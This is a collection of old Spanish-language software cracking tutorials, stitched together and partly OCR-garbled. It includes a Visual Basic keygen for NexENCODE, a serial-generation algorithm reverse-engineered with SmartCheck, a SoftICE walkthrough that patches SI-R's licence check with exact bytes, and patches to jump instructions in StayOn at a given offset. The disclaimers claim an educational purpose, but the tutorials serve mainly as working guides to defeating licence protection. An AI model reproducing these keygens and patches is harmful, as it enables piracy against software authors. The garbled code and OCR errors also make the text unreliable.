le corresponde asi: "Caracter = Chr (ValorDelCaracter)". 


Revertiendo a lo Visual Basic 


Esta es la parte interesante, cuando tienes al programa desarmado y puedes revertir todo el proceso para crear el 
codigo. Eso es lo que haremos: haremos los pasos al reves, ya que si el programa coge el SN y se inventa el nombre, 
nosotros vamos a coger el nombre y nos inventaremos el SN. 


Primero, que pasos sigue? Pues bien, mirando el ultimo cuadro que he puesto encima, seguiremos los pasos del 7 al 1 
(saltandonos algunos, claro esta) 


1. Cogemos el primer caracter del nombre (en mi caso "*zerU*"), o sea, "*", y le sacamos el valor ASCII: 42. 


2. Sacamos el XOR (que adivine por pura chiripa!): 42 XOR A = B, donde A es el valor ASCII del primer caracter (o 
segundo, tercero... depende del caracter en que estemos del nombre) de la llave rara, o sea el "1", que en ASCII es 49; y 
la B, por tanto es 42 XOR 49 = 27. 


3. Ya que el valor que queremos tiene que estar en Hexadecimal, lo pasamos a Hexadecimal: 27d = 1Bh. 


Bien, ahora lo puedes hacer, manualmente, con todos los otros caracteres (zerU*). Pero yo prefiero (soy un pijo) 
hacerme un KeyGen. El codigo esta en Visual Basic, para hacerle honor al NexENCODE, y es este: 


Const Llave As String = "pickles" "Define la llave para hacer el Password ("pickles") 

Dim Nombre As Integer, LlaveRara As Integer 'Define las variables que contendran el nombre y la "llave rara" 
Dim Contador As Integer, Password As String 'Define el contador para los bucles el contenedor del password 
Dim AscNombre As Integer, AscLlave As Integer 'Define las variables que contendran los valores ASCH 


If Len(Nombre) < 6 Then Exit Sub 'Si el tamaño del nombre es mas pequeño que 6, salimos del proceso 


For Contador = 0 To Len(Llave) - 1 Inicia un blucle para crear la "llave rara" 
LlaveRara = LlaveRara £ Asc(Mid(Llave, Contador + 1, 1)) 
Next 'Reinicia el bucle 


For Contador = 0 To Len(Nombre) - 1 'Inicia un bucle para crear el password 
AscNombre = Asc(Mid(Nombre, Contador + 1, 1)) 'Saca el valor ASCII del caracter del nombre 
AscLlave = Asc(Mid(LlaveRara, Contador + 1, 1)) 'Saca el valor ASCU del caracter de la "llave rara" 
AscNombre = AscNombre Xor AscLlave 'Realiza el XOR entre los dos valores ASCII 
Password = Password 8£ Hex(AscNombre) 'Va juntando los valores resultantes del XOR 

Next 'Reinicia el bucle 


Vaya matada! A ver si os pensais que el codigo se copia en colores... :-) Bueno, al finalizar los bucles tendremos el 


Password almacenado en la variable Password (que original, no?). En mi caso (ya que ya tienes un generador de llaves 
y decirtelo no sirve de nada) el resultado de "*zerU*" es "1B4B5743651F". Y lo mas bueno es que cuela: el programa 
te dice que "Thanks for registering!". Si te interesa desregistrarlo, cambia los valores "Name" y "Password" del fichero 
NexENCODE ini (que esta en la carpeta del programa) por otros que no sean validos. Si simplemente dejases en 
blanco los valores, al NexENCODE (que esta muy mal programado...) le cogeria un yuyu y no podrias disfrutarlo. 
Sobre todo recuerda que esto simplemente sirve para educar, disfrutar y aprender (en este programa especialmente). Si 
quieres usar el programa para fines "no personales”, COMPRALO! Aunque este lleno de fallos, generalmente funciona 
y me ha hecho mucho trabajo. 


Bueno, como dicen en mi tierra: adeu i fins una altra! 


zerU 
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INTRODUCCION 


En primer lugar decir que solo llevo un par de meses Crackeando, y esta es la primera vez que uso el Smartcheck. Si no me 
explico bien, lo siento...y todo hay que decirlo, NUMEGA ES LA LECHE! xD 


Bien, empecemos. Al cargar el programa vemos que se nos pide un numero de serie para registrarnos y quitar la molesta NAG. 
Si, esa con las tarjetas de credito! Pos na, ahora que tenemos el objetivo, solo falta idear la estrategia de ataque. Yo elegi el 
Smatcheck y ahora veremos el porqué. 


Ah, saludos al SuRfEr (Nau) y un saludo muy especial a mi novia 4StOrM”? de la que me siento muy orgulloso! Bezitoz mi mol 
DS 


AL ATAKE 


Despues de la Sensibleria y los cariñitos pos viene el trabajo, ok? Veamos. En primer lugar podemos abrir el ejecutable con el 
Windasm, que para mi es el primer paso en la mayoria de los casos, y lo unico que nos resulta sospechoso (al menos a mi) son 
dos cadenas muy largas. 

*NOTA: Usar el Wdasm con las librerias para Visual Basic xD 


Me pregunte ¿Seran estas cadenas el nombre y el serial respectivamente? Y tras probarlo me conteste NI DE COÑA! Entre 
otras cosas porque son muy largas xD Pero como parecen MUY sospechosas, nunca esta de mas echarles una copia y tenerlas 
a mano, por lo que pudiera pasar. Las cadenas son estas: 


cadenal = "AÁB45CC2DEÉFGHIÍ) KLMONÑOSOÓPQR67S3TIUÚVWXYZ22" 
cadena2 = "KXODLTQ1HORE2Y] PEPM34CWNIV59RZ8A7UFGGN" 


Es obvio que algun papel tienen que jugar en la generacion de las claves, asi que vete calentando eso del sentido comun, que 


en breve nos hara falta :) Salimos del Windasm y cargamos el ejecutable con el SmartCheck. Utilizar el Sice aqui seria bastante 
mas complicado, ya que esta en VB y las cadenas se guardan de manera distinta. 


Bien, ponemos a funcionar el Smartcheck y vemos como se generan una serie de Timer (que esto viene a ser el tiempo de 
espera cuando el logotipo del programa esta en pantalla), y luego sale nuestra ventanita en cuestion. Volvemos al Smartcheck 
y antes que nada miramos el Inicio_Load. Mmmm, hay un acceso a un archivo un tanto sospechoso. En realidad a 2: "reg.cd” y 
a "cd.cd". Podemos cerrar el Smartcheck y crear esos dos archivos y llenarlos de numerejos...pero no pasa nada : ( 

Vemos tambien que carga la cadenal. Parece que no vamos tan mal encaminados despues de todo. 


De cualquier forma, no esta aqui lo que buscamos. Si miramos en el ultimo Timer que se genera, vemos que se crea un 
Formulario llamado Registrar.Form. Sospechoso no?? Nos vamos acercando a pasos agigantados. 

Pos bien, si entramos en Registrar.Show vemos un monton de Timers. Y cuanto mas tardemos mas veremos, ya que no parara 
hasta que introduzcamos un nombre y un numero. Bueno, vamos a probar: 


PASO 1 - Encontrar un Serial Válido 


Metemos un nombre, por ejemplo y en mi caso ""DeStRoY”" y como numero, pues nada mas facil que 1111-2222-3333-4444 
y vemos lo que pasa. Pues que se quita la ventana... Tan facil? NO, porque esa ventana estará ahi a cada paso que demos. 
Pero volvamos al Smartcheck a ver como ha repercutido nuestro nombre :) 

Sabemos que se ha producido en evento Click en un Boton (Nuestro boton "Continuar”) asi que buscamos ese evento en al 
final de la lista de Timers dentro de Registrar.Show, y EUREKA, hay un Command1.Click. Sobra decir que entramos en el 
:) 


Ahora vemos como recoge nuestras cuatro series de numeros que forman el serial, nuestro nombre, carga la cadenal y 
concatena todos los numeros, los pasa a mayusculas con UCASE (lo que hace pensar que en el serial habran letras: D) y lo 
mismo con la cadenal. Luego nos devuelve la longitud de nuestro nombre, en mi caso 9. 


A continuacion viene la parte mas sospechosa: Coge cada uno de los caracteres del nombre, y realiza algun tipo de operacion 
con la cadenal, y devuelve un valor. Luego con la cadena2 y pasa al siguiente caracter. Y AQUI es donde entra en juego el 
sentido comun. Volveremos a esta parte mas adelante, cuando queramos crear el KEYGEN, de momento nos vale con 
conseguir una clave válida. 


Volvemos a cuando compara con la cadenal. Lo que hace es devolvernos el lugar donde se encuentra el caracter de nuestro 
nombre DENTRO de la cadenal. De momento puede resultar confuso, pero pasemos de esto un momento y vamos al final del 
Commandl1.click a ver que hay. 


Realmente sospechoso, los dos ultimos elementos (dos TRIM) son NUESTRO SERIAL y una serie de numeros y letras 
(K3EUÑMJ] MK). Pero claro, esta cantidad de letras no puede ser el serial correcto, porque no hay suficientes para llenar los 16 
espacios del serial... Un momento, ¡¡La cadena tiene la misma longitud que nuestro nombre!! ¿¿No es sospechoso??. Para 
asegurarnos Volvemos al punto 1 pero ahora introducimos un nombre mas largo. ¿Que de cuanto? Joder, pensad un poco! :D 
Si miramos de cuantos caracteres es el numero de serie, vemos que de 16. ¡¡Pues un nombre de 16!! Ademas, la primera y 
ultima letra del serial que vimos arriba son iguales, (K3EUÑM] MK) y las primera y ultima letra de mi nombre son "”", que no 
esta en la cadenal... Sospechoso tambien, eh? Probemos con el nombre "202222222 2222222" y como password 
"KKKKKKKKKKKKKKKK" yyyyyy Bl EEEENNN. El mensajillo de que lo hemos registrado. Pero por qué? Pues porque el 
caracter "”" no se encuentra en la cadenal y por lo tanto lo pone en el lugar O, y la letra que está en el lugar O en la 
cadena2 es la K. Facil, no? Otra cosa, miremos ahora el contenido de reg.cd. Ahi está nuestro serial! :) 


Pues eso, si queremos cambiar el seria, borramos el archivo REG.CD y probamos con otro, luego vamos al SmartCheck y 
miramos la cadena al final y listo, tenemos nuesto KEY listo y calentito. Por ejemplo, para el nombre "¡¡¡SOYELMEJ OR!!!" 
seria "KKKWDF8FZM4G3KKK" y vemos como el tema de las K se repite. :) 


PASO 2 - Realizar el Keygen 


Ahora estudiemos COMO funciona para asi poder crear el Keygen. Bien, para ello lo mas facil es repetir los pasos del PASO 1 y 
copiar el serial, para ver asi COMO lo ha generado. Pos bien, como consejo poned por nombre "AAAABBBBCCCCDDDD", o al 
menos asi lo hice yo ;) y nos da como resultado (en el smartcheck) el serial "XDQR5QRJ 7MO1YZPE". Bien, los copiamos los 
dos y ademas copiamos la cadenal y la cadena2. Vamos a estudiar! :) 


nombre = "AAAABBBBCCCCDDDD" 
serial ="XDQR5QR) 7MO1YZPE" 

cadenal = "AÁB45CC2DEÉFGHI Í] KLMONÑOBOÓPQR67S3TIUÚVWXYZ22" 
cadena2 = "KXODLTQ1HORE2Y] PBM34CWNIV59RZ38A7UF6GN" 


Ahora tenemos que mirar en el SmartCheck los valores que va devolviendo al mirar en la cadenal (si, donde dije que 
volveriamos!) que son algo asi: 


Vemos que devuelve para "AAAA" 1,3,6 y 10 


Double (1) -> Long (1) 
Mid 

Trirn 

Mid 

UCase 

Instr 

Mid 

UCase 

Instr 

Double (3) --> Lona [3] 
Mid 

Trirn 

Mid 

UCase 

Instr 

Mid 

UCase 

Instr 

Double (6) --> Long [6] 
Mid 

Trim 

Mid 

UCase 

Instr 

Mid 

UCase 

Instr 

Double (10) -> Lona (10) 


Double (25) --> Lona [25] 


$% Mid 
$% Trim 
$% Mid 
$% LiCase 
$% Instr 
+% Mid 
$% lCase 
$% Instr 


Double (43) -> Lona [43] 


$% Mid 
$% Trim 
$% Mid 
$% liCase 
$% Instr 
$% Mid 
$% lCase 
$% Instr 


Double (64) --> Long [64] 


$% Mid 
$% Trim 
$% Mid 
$% LiCase 
$% Instr 
$% Mid 
$% lUCase 
$% Instr 


Double (88) -> Long [88] 


Y para B 25, 43, 64 y 88 
Q CASUALIDAD!! SON LAS POSICIONES DE LAS LETRAS DEL SERIAL EN LA CADENA2!!! xD 


Pero ahi no acaba la cosa, ya que si probamos con otro nombre el invento no funciona, o al menos no de la misma manera. La 
cuestion es que hay una evolucion lógica para hallar estos valores, y vamos a estudianla. 


Primero Busca la letra en la cadenal y cuando la encuentra guarda la posicion (En el caso de la A es 1), despues multiplica la 
posicion donde se ha encontrado por la posicion que ocupa la letra en el nombre, y asi hallamos una cifra que sera clave para 
encontrar nuestra letra para el serial. PERO AHI NO ACABA TODO!! Ya que cada vez que buscamos una letra en la cadena2, 
la proxima vez que busquemos, deberemos empezar a mirar en la posicion donde acabamos antes!! No se si me explico, pero 
el esquema de busqueda se resumiria en esta operación: 


Pos_LetraEnCadena2 = (Pos_EnElNombre * Pos EnCadenal) + Pos_LetraEnCadena2 


Asi, para nuestro serial sería (Recuerda q en VB las cadenas empiezan a contar por 0): 


(1+1) 

(2*1) 

(3*1) 

A4 -> Pos LetraCadena2 = (4*1) 

B1 -> Pos_LetraCadena2 = (5*3)+10 = 25 (5) 
(6*3) Q) 
(73) R) 
(8*3) 


Y asi sucesivamente. Como nota, piensa que habra veces en que el lugar a buscar sea mayor que el tamaño de la cadena2. 
Para resolver esto, no tienes sino que restarle el tamaño de la cadena2 hasta que sea menor. Por ejemplo, si el tamaño de la 
cadena es 37, para hayar B4 haz: 


B4= B4-37=51 
B4=51-37=14 ()) 


Y eso es todo, espero que lo hayas entendido. Si tienes alguna duda o si te resulta util este tutorial, te agradecería que me 
escribieras a bhkkrom20hotmail.com. 


Agradecimientos a Karpoff por esta peaso Page que ayuda a le gente que esta empezando, y a toda la gente del 
kanal +*crackers que nunca me contestan cuando pregunto :b 


Aviso que este es tanto mi primer tutorial como mi primer keygen ;) Lo siento si no he sabido explicarme! 
Saludos a la peña del Klan [KTDN] de Tenerife para el Counter Strike. XD 


Y a FrOdO el Cheto xDDD 
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INTRODUCCION 


Este tute está pensado para los inexpertos o poco experimetados en la ingeniería inversa ya que su nivel de 
dificultad es mínimo. Hemos seleccionado esta cobaya precisamente por eso, su sencillez. 

SER está escrito en Visual Basic 6. Su protección es... digamos... casi nula. Un número de serie nos 
autoriza el uso de este programa durante un periodo de tiempo, determinado por el código introducido. Una 
vez transcurrido este tiempo el usuario ha de volver a adquirir otra licencia y se le otorga otro código nuevo. 
Para que SI-R funcione, será necesario tener instalado Microsoft Data Access y Windows Installer, ambos 
componentes podeis bajarlos desde la página de SIR. 

Tan solo vamos a utilizar 3 herramientas, Smartcheck (que llamaremos a partir de ahora smc), softice (al 
que ya llamamos sice) y un editor hexadecimal para parchear el ejecutable, utilizad el que os parezca bien, si 
usais patcher nosotros estaremos encantados, podeis bajarlo de nuestra página :0). También necesitaremos 
algún programa que nos informe de los DLL y las funciones que importa, nosotros, por supuesto, usaremos 
pupe. Habíamos pensado compilar para esta ocasión una nueva versión del veoveo, que también podeis 
encontrar en nuestra página, para la activación de todos los botones desactivados en SER pero al final no ha 
sido necesario, así que nos guardamos este arma para futuros experimentos y la usaremos en otro tutorial. 

Quiero que quede claro que la programación y el crack tienen algo en común y es que, dependiendo de 
qué persona esté crackeando y/o programando, los pasos a seguir serán completamete diferentes aunque el fin 
y resultado sea el mismo. Con esto quiero decir que probablemente otro cracker atacaría esta aplciación por 
otro flanco y de otro modo diferente consiguiendo indeticos resultados. 


Bien, suponemos que ya teneis instalado los 3 componentes necesarios para rodar SI-R y las herramientas. En 
este caso no es necesario, pero es muy importante observar ciertos detalles de la instalación cuando queremos 
destripar una aplicación, estos detalles son: Archivos que lee y escribe y claves del registro que lee y escribe. 
Para ello debereis utilizar file monitor y register monitor. Hablaremos de ellos en otro momento. 


SER solo funciona en 800 X 600 y tipo de letra pequeño, tenedlo en cuenta. 


| AL ATAKE | 


Paso 1. Observar los dll y funciones que importa: 


Rodamos SER y observamos que además de ocupar toda la pantalla, se ejecuta en primer plano y oculta la barra de 
tareas. No podemos ver el escritorio y nos hace un desmierde en la configuración de la pantalla. Para poder utilizar las 
herramientas, mientras está rodando la aplicación, podeis añadirlas al menú inicio, de tal modo que cuando las necesiteis 
tan solo tendreis que pulsar Ctrl y Esc para que inicio se abra y desde ahí lanzarlas con un click. 

En este momento (tenemos rodando SI-R), nuestro interés se centra en averiguar qué funciones y de qué dll's está 
utilizando. Lanzamos pupe y sombreamos con un click el proceso SI-R, a continuación pulsaremos el botón derecho del 
ratón para que se abra el menu de pupe donde activaremos la 'caja de herramientas'. Ahora, sobre la caja de 
herramientas, buscaremos el modul SI-R.exe, lo sombreamos de nuevo y volveremos a pulsar el botón derecho del ratón 
para cargar este módulo. En la sección de más herramientas pulsaremos el botón 'Visor F.I.'. Se nos abrirá una ventana 
donde podemos observar los dll y funciones importados. Vemos que uno de los DLL es MSVBVM60, lo que nos indica 
que es una aplicación vb6, y abriendo el arbol observamos las funciones que importa de él. Cerramos pupe y antes de 
proceder a utilizar smc observamos cómo funciona la aplicación. En el dialogo vemos una bonita foto a la derecha 
donde al hacer un click se abre otro dialogo con las opciones. Debajo de esta foto hay un relojito muy mono, esto nos 
sugiere que SI-R hara uso de una función timer para actualizarlo, así que cuando estemos capturando eventos con smc lo 
haremos de forma rápida y concreta para evitar cargarlo de eventos no necesarios. Veamos qué pasos tendremos que dar 
para que smc nos capture los eventos que nos interesan. Primero haremos un click sobre la foto. A continuación otro 
click sobre contratar SI-R. Un pequeño diálogo nos invita a introducir el código de usuario y observamos un código en 
este diálogo que en nuestro caso es 'cOjnwuwi'. Ya sabemos todo lo necesario para la captura de eventos, anulamos y 
pulsamos sobre cierre->salir sin cerrar caja para finalizar SI-R. 


Paso 2. Captura de eventos: 


Rodamos smc. En el menú abrimos, buscando la ruta, SI-R. Pulsamos FS y lo ponemos a rodar. A lo largo de la 
ejecución, en smc nos aparecerán una serie de errores sin relevancia alguna para nosotros, así que iremos pulsando sobre 
'Acknowledge' acada vez que esto suceda hasta que la aplicación esté en marcha. Una vez abierto el diálogo principal de 
SER es muy importante ir directamente al grano y lo más rápido posible para evitar todos aquellos eventos no 
necesarios. Pulsaremos sobre la foto=>contratar SI-R e introduciremos la cadena '10000002*. Un mensaje de error nos 
advierte de que el código no es bueno, faltaría más. 

Y a tenemos toda la información que necesitamos almacenada en smc. Cerramos el dialogo de contratar y 
directamente hacemos cierre y salir sin cerrar caja. Nos encontraremos en smc. Sobre el menú 'program' pulsaremos 
'end' para finalizar y a continuación 'file'=>'save as' para guardar todo lo sucedido. 


Paso 3. Busqueda de los eventos que nos interesan. 


Si os fijais, incluso habiendo sido cautos y rápidos en las acciones, vereis que tenemos 800.000 eventos 
aproximadamente. A nosotros nos interesa saber todo lo que ha sucedido desde que hemos hecho click después de 
introducir '10000002' dentro de contratar SER y sabemos que, para llegar hasta ahí, hemos hecho 3 clicks, unos sobre la 
foto, otro sobre el botón contratar y otro despues de haber introducido el código. Sobre el menú de smc pulsaremos 
Edit=>find e introduciremos 'click' para buscar este evento. Seguiremos 'find next' hasta situarnos sobre el tercer evento 
click que es el que le ha proporcionado a SI-R el número introducido. Procurad tener en las opciones activado Expand 
all para poder observar eventos dentro de otros eventos. Observareis que se utiliza la función vbaStrCmp de MSVBM60 
poco despues del evento click pero esta comparación de cadenas no nos interesa porque todavía no ha operado con lo 
que hemos introducido, así que seguimos buscando. 

Vereis que algunos eventos después se captura el código del dialogo de contratar 'cOjnwuwi' y el itnroducido por 
nosotros '10000002”. Con ellos, Si-R realiza una serie interminable de operaciones que dan como resultado una cadena, 
en nuestro caso '308900576807', después realiza otra serie de operaciones cuyo resultado es '308900808503' y a 
continuación se llama de nuevo a la función vbaStrCmp pasándole como parámetros estas dos cadenas nuevas. El 
retorno de la función es un bonito FFFFFFFFE, y a continuación la función MsgBox nos muestra el diálogo de numerito 
no válido. Parece que está todo bastante claro, no?. Nuestro trabajo con smc ha concluido, ya sabemos todo lo que 
necesitamos, ahora usaremos sice. 


Paso 4. Traceo puro y duro. 
antes de nada, nos aseguraremos que en winice.dat tenemos la siguiente línea: 


EXP=cWwindows|systemimsvbvm60.dll 


Esto será necesario para poder interceptar la función vbaStrCmp. 

Reiniciamos el sistema para que sice cargue la nueva configuración y rodamos SI-R hasta llegar al diálogo donde 
itroducimos el numerito, recordad 10000002. 

Antes de pulsar 'aceptar' entraremos en sice pulsando Crtl+D y pondremos un bonito break point con la orden 'bpx 
vbaStrCmp'. Pulsamos FS para volver a win y botón de aceptar para que SI-R capture nuestro código. 

En teoría debería haberse detenido la ejecución y tendríamos que estar dentro de sice pero no es así, vaya, era 
demasiado fácil, no? La alternativa es repetir la operación y antes de pulsar sobre el botón aceptar entramos en sice 
(Ctrl+D) y bpeamos hmemcpy con la orden 'bpx hmemcpy". Salimos de sice (FS) y pulsamos aceptar. Ahora sí estamos 
dentro de sice... pero en user. 


Paso 5. Busqueda de un punto de ruptura dentro de SI-R 


Nos encotramos dentro de user y no podemos detener la aplicación con un bpx en vbaStrCmp. Pulsamos varias 
veces F12 dentro de sice para regresar a la aplicación. Despues de 6 F12 observamos que nos encontramos en el módulo 
MSVBVM6O0 y con otro F12 nos metemos en SI-R. Ahora es cuestión de ir traceando hasta tropezarnos con una 
instrucción call [MSVBM60!__ vbaStrCmp]. Tendremos que recorrer el código para encontrarla. Una vez encontrado 
quitaremos todos los bp's con la orden 'bc *' y haremos un doble click sobre call [USVBM60!__vbaStrCmp] para 
ponerle un bonito bp. Volvemos a SI-R con ES y rodamos hasta que sice se detiene en nuestro Break point. Tracearemos 
con ES para que nos lleve al comienzo de vbaStrCmp. Una vez dentro, quitaremos todos los bp's con 'bc *' y haremos 
doble click sobre el comienzo de vbaStrCmp para poder romper luego en él. Salimos con FS a Si-R. Si alguno de 
vosotros no encuentra la función buscad dentro de sice en la posición XXX:0058D00C. 


Paso 6. Detener SIR donde nos interesa. 


Volveremos a pulsar sobre el botón de aceptar para que SER capture otra vez nuestro código y ahora sí se dentiene 
en vbaStrCmp pero recordar que en los eventos se producía la llamada a esta función en dos ocasiones, la primera no 
nos sirve para nada, así que FS para que rompa en la segunda. 


Paso 7. Parcheo sobre memoria. 


Sice vuelve a romper. La instrucción anterior a call [US VBM60!__ vbaStrCmp] es un push eax. Con la orden 'D 
eax' observamos que eax contiene uno de los valores que SI-R ha generado con el código que hemos introducido y el 
código que aparece en el diálogo de comprar SER (308900808503). Hemos dado en el clavo. Si pulsamos F10 para que 
se ejecute la función observamos que al retorno EAX contiene un FFFFFFFF. Si sustituimos el valor de EAX por cero 
veremos que nos hemos registrado por un periodo de muchos años. Ya lo tenemos. 


Paso 7. Captura de datos para parchear el ejecutable. 


Repetiremos toda la operación para llegar al momento en que sice rompe en el segundo vbaStrCmp. Anotaremos 
los bytes que componen algunas intrucciones por delante y por detrás del call para poder buscarlos en el editor 
hexadecimal (F7, D8, 1B, CO, 8D, 4D, 90, 40). Modificaremos la intrucción que tenemos después del call (NEG EAX) 
por un XOR EAX, EAX, de este modo pondremos EAX a cero para que SI-R de por válido nuestro número introducido. 
Suponiendo que NEG EAX lo tengais en 16F:0058D012 lo modificaremos con la orden 'a 16F:0058D012' y 
ensamblaremos XOR EAX, EAX. Anotamos los nuevos bytes resultantes después del cambio (33, CO, 1B, CO, 8D, 4D, 
90, 40) y salimos. Cerramos SER. 


Paso 8. Parcheo sobre el ejecutable. 


Con un editor Hexadecimal, ultra edit por ejemplo, buscaremos la cadena que había en Si-R antes de modificarla, o 
sea F7, D8, 1B, CO, 8D, 4D, 90, 40. Una vez localizada, nos aseguraremos de que es la correcta comprobando más bytes 
por delante y por detrás. La cambiamos por la resultante del xor eax, eax, o sea 33, CO, 1B, CO, 8D, 4D, 90, 40 y 
guardamos los cambios. 


Paso 9. Aplicación totalmente operativa para un perido de algunos años. 
Ejecutar SI-R y comprobar que nuestro trabajo ha sido eficaz, limpio y, sobre todo, con un cambio de 2 bytes. 


Esperamos habernos explicado con claridad y que os sirva para algo este sencillo ejercicio. 


Un saludo 
Crack el Destripador $ Marmota 
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INTRODUCCION 


Hi Tutorial de Crackeo Para Newbies desde Cero 08/08/99 


Por Karpoff 


PROYECTO 1 HH 


Staynon 98 v 1.5 


He escogido este programa porque creo que es uno que esta a la altura de cualquier 


newbie que quiera intentarlo. 


Podéis bajar el programa de 


http://shareware.intercom.es/servlets/busca2?n=3594 


Este programa nos da 30 usos, agotados los 30 usos nos sale un nagscreen para 


introducir un N/S si es incorrecto se cierra el programa. 


Los ataques que podemos Utilizar son localiza la rutina donde se comprueba él numero 
de serie falso que metamos con el original, y de esta manera Capturaremos el 


Original. 


O podemos localizar la rutina que se encarga de comprobar cuantos usos llevamos y 
manipularla para que haga la comprobación al reves ósea no registrado seria como 
estar registrado, o podríamos eliminar esa rutina si no fuese mas que para comprobar 
los usos que llevamos o si solo comprobase si nos hemos registrado o no ( lo 
entendéis..?). Como esta pagina esta dedicada para newbies desde cero, utilizaremos 


la segunda opción 


herramientas: desensamblador W32dasm y un editor hexadecimal Hex Workshop32 , 


ultraedit etc. yo usare el primero 


[ ALATAKE | 


Comenzamos a currar. Siempre que nos dispongamos a estudiar cualquier Programa tenemos que 
fijarnos con ojos de búho como se ejecuta el programa, que mensajes nos da, que limitaciones 
tiene, que pasa si intento registrarlo, que pone en el about, etc. Etc. Etc. Y podéis ir 


apuntando lo que creáis interesante. 


Bueno al ejecutar el programa vemos que no sale ninguna pantalla que nos indique que tenemos 
30 usos, tampoco nos sale el típico nag para registrarnos, pero en el propio programa leemos 
la frase You Have 30 Uses Remaining!! ( te quedan 30 usos) cada vez que inicies el programa 


te quita uno. 


Apuntamos la frasecita y pasamos a ver que hace cuando intentamos meter un numero de serie 
cualquiera así que vamos a Register y elegimos la opción Enter registration Number ponemos 
ej. 111111112 pulsamos OK y vemos que no nos dice nada ósea que descartemos ese punto de 
ataque que seria de los mas frecuentes localizar el aviso que nos sale y apartir de hay 
buscar las rutinas que han hecho la llamada al nagscreen, pero como no hay aviso pos nada. 


Que podemos hacer... 


LO primero hacer una copia del ejecutable stayon.exe en el mismo directorio donde lo hemos 
instalado la copia será parra aplicarle los cambios que vayamos haciendo podemos llamar a la 


copia stay.exe 


ejecutamos el W32dasm y desensamblamos stayon.exe, una vez que termine de desensamblarlo 
pulsamos el botón -Strn Ref- esto nos mostrara una ventana con todas las cadenas de texto 
que se encuentren en el programa como podrían ser los mensajes de error o cualquier texto 
que el programa pueda mostrar durante su ejecución, que podemos buscar? Lo lógico seria 
buscar el mensaje de error que nos tendría que haber dado al intentar registrarlo pero como 
no hay mensaje de error tendremos que encontrar una solución, Os recomiendo que no tengáis 
ninguna prisa ir con calma si no tenéis muchas ganas hoy ya continuareis otro dia no 
conviene agoviarse que no estamos currando ;¡-D. si revisamos paso a paso todas la cadenas de 
texto no encontramos ninguna frase típica como Expired Program, o Thank you Regidter, pero 
si vemos la frase que nos avisa de los usos que nos quedan, si os acordáis salía al ejecutar 
el programa, bueno pues ya tenemos el punto de ataque, hacemos doble clip encima de la frase 


y nos lleva directamente a el siguiente código. 


* Posible StringData Ref. from Data Obj -> "You Have $d Uses Remaining|!" 


:00401B11 68D4504000 PUSH 004050D4 


:00401B16 8D55BC lea edx, dword ptr [ebp-44] 


Para que salga ese mensaje a tenido que haber un momento en la ejecución del programa en la 
que realiza la comprobación de cuantos días nos quedan o si estamos o no registrados, Ósea 
que tiene que haber por ahí una rutina o parte del código que si estamos registrados no nos 
manda al código de error por lo tanto esa rutina o ese código podemos manipularlo ya que si 
estaríamos registrados nunca nos mostraría este mensaje noo? ( entendéis la lógica que os 
intento explicar esto es aplicable a todos los programas, unos muy retorcidos otros muy 


sencillos pero todos se pueden manipular para nuestro beneficio) 


bueno pues busquemos por encima de este código haber que encontramos. 


lo que intento localizar es un salto que si estamos registrados evite la rutina de error y 


si no siga adelante con la comprobación, 


y en 00401ABF tenemos un salto que podría comprobar si estamos registrados o cuantos usos 
nos quedan vemos que según el valor que lleve eax salta pasando el mensaje de cuantos usos 


nos quedan o continua normalmente 


:00401ABD 85C0 test eax, eax 
:00401ABF 7573 jne 00401B34 ------— > SALTO A LA RUTINA DE COMPROBACIÓN 


:00401AC1 8B4DA8 mov ecx, dword ptr [ebp-58] 


Bueno pues probemos a modificar el salto para que no realice las comprobaciones De usos o de 


si estamos registrados. 


00401ABF 7573 JNE 00401B34 POR 


T 


00401ABF 7473 JE 00401B340 O POR 


00401ABF EB73 JMP 00401B340 


Con Cualquiera de los dos cambios el programa funcionaria perfectamente con el primero 
invertiríamos la rutina de tal manera que lo bueno seria no estar registrado ( entendéis 
espero que si.) y el segundo cambio es un salto incondicional ósea que estemos o no 


registrados ejecuta el salto de tal manera qu vita el mensaje. 


Para poder cambiar el salto necesitamos el editor hexadecimal, ejecutamos el editor ex que 
tengamos pulsamos abrir archivo y abrimos la copia que hemos guardado antes stay.exe , y 
como localizamos en el editor el código que tenemos que cambiar, para eso volvemos al 
W32dasm y pinchamos con el ratón la línea donde esta el salto que queremos cambiar ósea 
00401ABF 7573 JNE 00401B34 al selelcionarla se resaltara de color verde entonces mira en la 


barra de estado la barra de estado es la barra de abajo ahí hay algunos números mira el que 
pone offset: O0000EBFh debes pulsar la opción goto Hex o find offset dependiendo de que 
editor tengar supongo que no tendrás problemas y sino pues pruebas asta que lo encuentres 
debes meter la dirección del offset que te indica el desendamblador en este Caso EBF la [ h 
] del final no se pone nunca y los ceros anteriores lo que tu quieras si quieres los pones o 
no, aparecerás en el código hexadecimal exactamente en E8E7 0600 0085 CO075 738B en el 75 que 
esta en negrita he puesto los números de alrededor para que te agas una idea de cómo lo vas 
a ver, ya solo te queda aplicar los cambios que son el 74 cambiarlo por 74 o por EB Espero 
que entendáis este manual y que os sea de ayuda, parece que no pero cuesta un huevo escribir 


estos manuales asta el siguiente. 


75 = jne 
74 = Je 

eb = jmp 
90 = nop 


Este material es solo para uso educativo, por ahora los cracks son ilegales. 
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INTRODUCCION 


TUTORIAL DE CRACKEO PARA NEWBIES DESDE CERO 09/08/1999 


PROYECTO 2 +4 Por Karpoff 


StayOn the NET Pro V2.92 


Hola nuevamente a todos los que habéis decidido seguir esta serie de proyectos para 
Newbies desde Cero. 


El proyecto que hoy os presento es muy parecido al anterior, si recordáis en el 
proyecto anterior el ataque elegido fue modificar la rutina que se encargaba de 
comprobar el numero de usos que llevábamos ya que teníamos un limite de 30 usos, 
cambiando un salto hicimos que el programa no comprobara el numero de usos quedando 
así sin ninguna limitación. 


Hoy simularemos estar registrados ósea que al meter cualquier N/S lo acepte evitando 
así el que nos caduque a los 30 días, el programa elegido es similar al anterior pero 
mas completo, 


Lo podéis coger de... 


http://www.stayonpro.com 


Herramientas un desensamblador ( W32Dasm ) y un editor HEX (Hex Workshop32, 
UltraEdit32 etc. ) 


Empezamos: Me gustaría que os fijaseis con mucho detalle en el código y las rutinas 
del programa, no utilicéis este tutoría a ciegas intentar entender todo lo que ocurre 
ya que no se trata de que hagais un crack sino que aprendáis a hacerlos, yo intentare 


explicarme lo mejor que pueda dentro de mis posibilidades ;-D. 


AL ATAKE 


Bueno ejecutar el programa y fígaros bien en su funcionamiento lo primero que hace es 
mostrarnos un NagScreen con la fecha limite que tenemos para evaluarlo y nos da la 
oportunidad de registrarnos, si metemos un N/S cualquiera el programa sigue su ejecución 
normal sin mostrarnos si el numero es correcto o no. 


